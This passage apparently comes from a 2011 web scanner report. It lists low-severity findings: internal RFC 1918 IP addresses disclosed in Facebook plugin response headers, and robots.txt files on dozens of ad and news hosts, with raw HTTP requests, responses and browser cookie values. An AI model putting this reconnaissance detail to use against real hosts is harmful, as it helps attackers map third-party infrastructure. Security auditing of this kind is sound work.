Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.154.42
X-Cnection: close
Date: Sun, 04 Sep 2011 00:52:51 GMT
Content-Length: 240

<script type="text/javascript">
parent.postMessage("cb=f7c80e7dc&origin=http\u00253A\u00252F\u00252Fwww.reuters.com\u00252Ff1e65ca694&relation=parent&transport=postmessage&frame=f7b422f7", "http:\/\/w
...[SNIP]...

25.17. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.187.56

Request

GET /extern/login_status.php?api_key=5597051e9d2034b294865dbb43c47ee0&app_id=5597051e9d2034b294865dbb43c47ee0&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df82933318%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df25835a4b8%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc5dcd168%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1815fe6b8%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc5dcd168&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df23e5bae18%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc5dcd168&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1eb7ab58c%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc5dcd168&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.187.56
X-Cnection: close
Date: Sun, 04 Sep 2011 00:44:29 GMT
Content-Length: 262

<script type="text/javascript">
parent.postMessage("cb=f23e5bae18&origin=http\u00253A\u00252F\u00252Fwww.charlotteobserver.com\u00252Ff3bf22f854&relation=parent&transport=postmessage&frame=fc5dcd168",
...[SNIP]...

25.18. http://www.facebook.com/home.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/home.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.188.39

Request

GET /home.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.19. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.193.39

Request

Response

25.20. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.194.36

Request

GET /plugins/like.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.21. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.220.55

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&layout=standard&show_faces=false&width=450&action=recommend&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

25.22. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.224.53

Request

Response

25.23. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.205.50

Request

GET /plugins/like.php?action=recommend&api_key=5597051e9d2034b294865dbb43c47ee0&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dffeb1f384%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.charlotteobserver.com%2F2011%2F09%2F03%2F2577566%2Fraceday-danica-already-gone.html&layout=standard&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=400 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

25.24. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.34.64

Request

GET /plugins/like.php?action=recommend&api_key=5597051e9d2034b294865dbb43c47ee0&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df281409b84%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.charlotteobserver.com%2F2011%2F09%2F03%2F2577566%2Fraceday-danica-already-gone.html&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=225 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

25.25. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.24.54

Request

Response

25.26. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.199.40

Request

GET /plugins/likebox.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.27. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.15.49

Request

Response

25.28. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.184.60

Request

GET /plugins/recommendations.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.29. http://www.facebook.com/share.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/share.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.200.54

Request

GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.30. http://www.facebook.com/sharer.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.196.51

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/sharer/sharer.php
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.196.51
Connection: close
Date: Sun, 04 Sep 2011 01:25:59 GMT
Content-Length: 0

25.31. http://www.goutsa.com/ViewArticle.dbml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.goutsa.com
Path:	/ViewArticle.dbml

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.3.8.159

Request

GET /ViewArticle.dbml HTTP/1.1
Host: www.goutsa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:11 GMT
Server: Apache
P3P: policyref="http://www.goutsa.com/TermsAndConditions.dbml?DB_OEM_ID=13100", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Length: 68639
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma
...[SNIP]...

...[SNIP]...

26. Robots.txt file previous next
There are 137 instances of this issue:

http://206537.r.msn.com/
http://243973.r.msn.com/
http://943042.r.msn.com/
http://a.tribalfusion.com/j.ad
http://ad.afy11.net/ad
http://ad.doubleclick.net/adj/N763.usatoday.comOX3622/B5770010.6
http://ad.turn.com/server/pixel.htm
http://ad.yieldmanager.com/pixel
http://ads.undertone.com/ajs.php
http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5
http://api.affinesystems.com/event/impression
http://api.bizographics.com/v1/profile.redirect
http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json
http://ar.atwola.com/atd
http://as.casalemedia.com/s
http://b.scorecardresearch.com/b
http://blogs.reuters.com/wp-content/widgets/rtrxtra/rac.php
http://bookmarks.yahoo.com/myresults/bookmarklet
http://c.brightcove.com/services/viewer/federated_f9
http://c5.zedo.com/ads2/f/722607/3840/0/0/305000825/305000825/0/305/263/zz-V1-pop1304968607137.html
http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js
http://cdn.gigya.com/js/socialize.js
http://cdn.optmd.com/V2/89733/235451/index.html
http://cdn.turn.com/server/ddc.htm
https://cdns.gigya.com/gs/SafariIDsProxy.htm
http://charlotteobserver.adperfect.com/
http://clk.fetchback.com/serve/fb/click
http://cm.g.doubleclick.net/pixel
http://cm.npc-mcclatchy.overture.com/js_1_0/
http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
http://delivery.sprint.com/m/p/nxt/reg/cmb/generic.asp
http://digg.com/submit
https://docs.google.com/
http://dw.com.com/clear/c.gif
http://espn.go.com/dallas/ncf/preview
http://feedburner.google.com/fb/a/mailverify
http://findnsave.sacbee.com/api/groupon.json
http://friendfeed.com/share
http://funds.reuters.com/lipper/retail/reuters/overview.asp
http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH
https://google.com/accounts/Logout
http://googleads.g.doubleclick.net/aclk
http://groups.google.com/groups
http://images.google.com/support/bin/answer.py
http://imp.fetchback.com/serve/fb/adtag.js
http://itunes.apple.com/us/app/the-sacramento-bee-for-ipad/id446757012
http://jlinks.industrybrains.com/jsct
http://l.addthiscdn.com/live/t00/250lo.gif
http://legolas.nexac.com/lgalt
http://links.industrybrains.com/click
http://load.exelator.com/crossdomain.xml
https://mail.google.com/mail/
https://maps-api-ssl.google.com/maps
http://maps.google.com/maps
http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s88955233080778
http://news.google.com/news/story
http://nextelonline.nextel.com/tl/set_tl.html
http://nmcharlotte.112.2o7.net/b/ss/nmcharlotte/1/H.20.3/s85129847696516
http://notredame-hospitality.cbscollegestore.com/store.cfm
http://ocp.ncaa.com/adFunctions.js
http://odb.outbrain.com/utils/get
http://pagead2.googlesyndication.com/pagead/imgad
http://paid.outbrain.com/network/redir
http://pbid.pro-market.net/crossdomain.xml
http://picasaweb.google.com/lh/view
http://pixel.invitemedia.com/admeld_sync
http://pixel.quantserve.com/seg/r
http://premium.mookie1.com/2/nbc.com/ac@Bottom3
http://pubads.g.doubleclick.net/gampad/ads
http://r.turn.com/server/pixel.htm
http://rd.rlcdn.com/rd
http://rt.legolas-media.com/lgrt
http://rtq.careerbuilder.com/RTQ/jobstream.aspx
http://s0.2mdn.net/1181183/espn_cfb_728x90_sn_main.swf
http://sacramentoconnect.sacbee.com/
http://safebrowsing.clients.google.com/safebrowsing/gethash
http://scholar.google.com/scholar
http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826
http://search.charlotteobserver.com/search-bin/search.pl.cgi
http://search.spotxchange.com/partner
http://search2.sacbee.com/search-bin/search.pl.cgi
http://shlinks.industrybrains.com/sh
http://shop2.sprint.com/assets/olsvideo/mediaPlayer.html
http://shopping.sacbee.com/ROP/Subcat.aspx
http://simg.zedo.com/speed-test/10k.gif
https://sites.google.com/
http://slashdot.org/bookmark.pl
http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://store.cstv.com/marketplace/store.cfm
http://sync.mathtag.com/sync/img
http://tag.admeld.com/ad/js/741/mcclatchy/728x90/sacramento_sacbee
http://tcr.tynt.com/javascripts/Tracer.js
http://traffic.outbrain.com/network/redir
http://translate.google.com/
http://trc.taboolasyndication.com/reuters/log/2/debug
http://tu.connect.wunderloop.net/TU/1/1/1/
http://twitter.com/home
http://und.cbscollegestore.com/store.cfm
http://und.cstvauctions.com/auctiondisplay.cfm
http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954
http://webcache.googleusercontent.com/search
http://www.bayareasearchengineacademy.org/blog/
http://www.bizographics.com/collect/
http://www.careerbuilder.com/share/login.aspx
http://www.cars.com/go/crp/index.jsp
http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
http://www.facebook.com/plugins/like.php
http://www.fmglobal.com/default.aspx
http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html
http://www.freep.com/article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football
http://www.google-analytics.com/__utm.gif
http://www.google.com/trends
http://www.googleadservices.com/pagead/conversion/1031221371/
http://www.greenbiz.com/
http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story
http://www.linkedin.com/countserv/count/share
https://www.linkedin.com/secure/login
http://www.myspace.com/Modules/PostTo/Pages/
http://www.nbcudigitaladops.com/hosted/util/setRemoteDomainCookies.html
http://www.newslibrary.com/nlsearch.asp
http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
http://www.sologig.com/
http://www.sprint.com/
https://www.sprint.net/
http://www.stumbleupon.com/submit
http://www.thatsracin.com/reg-bin/int.cgi
http://www.traffic.com/Charlotte-Traffic/Charlotte-Traffic-Map.html
http://www.tsn.ca/ncaa/story/
http://www.tulsaworld.com/site/articlepath.aspx
http://www.tumblr.com/share
http://www.usatoday.com/community/profile.htm
http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html
http://www.wunderground.com/auto/sacbeeXML/geo/WXCurrentObXML/index.xml
http://www.youtube.com/results
http://www.zvents.com/images/internal/5/6/5/2/img_13432565_thumb.jpg

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

26.1. http://206537.r.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://206537.r.msn.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 206537.r.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2147483647
Content-Type: text/plain
Last-Modified: Thu, 04 Aug 2011 19:57:46 GMT
Accept-Ranges: bytes
ETag: "936ba6c7e052cc1:0"
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Sun, 04 Sep 2011 01:21:04 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

26.2. http://243973.r.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://243973.r.msn.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 243973.r.msn.com

Response

26.3. http://943042.r.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://943042.r.msn.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 943042.r.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2147483647
Content-Type: text/plain
Last-Modified: Thu, 04 Aug 2011 19:57:46 GMT
Accept-Ranges: bytes
ETag: "936ba6c7e052cc1:0"
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Sun, 04 Sep 2011 01:21:06 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

26.4. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/plain
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

26.5. http://ad.afy11.net/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 06 Jul 2007 06:09:38 GMT
Accept-Ranges: bytes
ETag: "78f7133c94bfc71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:21:08 GMT
Connection: close
Content-Length: 30

User-agent: *
Disallow: /

26.6. http://ad.doubleclick.net/adj/N763.usatoday.comOX3622/B5770010.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.usatoday.comOX3622/B5770010.6

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Sun, 04 Sep 2011 01:21:13 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

26.7. http://ad.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sun, 04 Sep 2011 01:05:49 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

26.8. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.yieldmanager.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 00:42:18 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 00:42:18 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

26.9. http://ads.undertone.com/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/ajs.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 29 Aug 2011 20:44:50 GMT
ETag: "42680a8-1a-4abaaf7619480"
Content-Type: text/plain; charset=UTF-8
Date: Sun, 04 Sep 2011 00:45:04 GMT
Content-Length: 26
Connection: close

User-agent: *
Disallow: /

26.10. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/13966-88303-3335-5

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1158796162000"
Last-Modified: Wed, 20 Sep 2006 23:49:22 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 04 Sep 2011 00:45:20 GMT
Connection: keep-alive

User-agent: *
Disallow: /

26.11. http://api.affinesystems.com/event/impression previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.affinesystems.com
Path:	/event/impression

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.affinesystems.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:21:56 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Tue, 14 Jun 2011 23:53:24 GMT
ETag: "2c256f-1a-4a5b4bdcf0500"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

26.12. http://api.bizographics.com/v1/profile.redirect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.bizographics.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Date: Sun, 04 Sep 2011 00:57:22 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

26.13. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/1/UND_com/lists/notre-dame-football/statuses.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:23 GMT
Server: Apache
Vary: Host,Accept-Encoding
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=86400
Expires: Mon, 05 Sep 2011 00:49:23 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

26.14. http://ar.atwola.com/atd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.atwola.com
Path:	/atd

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ar.atwola.com

Response

HTTP/1.1 200 OK
Expires: Sun, 25 Sep 2011 01:13:23 GMT
Date: Sun, 04 Sep 2011 01:13:23 GMT
Content-Length: 28
Content-Type: text/html

User-agent: *
Disallow: /

26.15. http://as.casalemedia.com/s previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://as.casalemedia.com
Path:	/s

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: as.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Sep 2010 18:44:55 GMT
ETag: "15683a6-1a-cb0517c0"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Expires: Sun, 04 Sep 2011 01:02:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:02:07 GMT
Connection: close

User-agent: *
Disallow: /

26.16. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Mon, 05 Sep 2011 00:42:17 GMT
Date: Sun, 04 Sep 2011 00:42:17 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

26.17. http://blogs.reuters.com/wp-content/widgets/rtrxtra/rac.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.reuters.com
Path:	/wp-content/widgets/rtrxtra/rac.php

Issue detail

The web server contains a robots.txt file.

Request

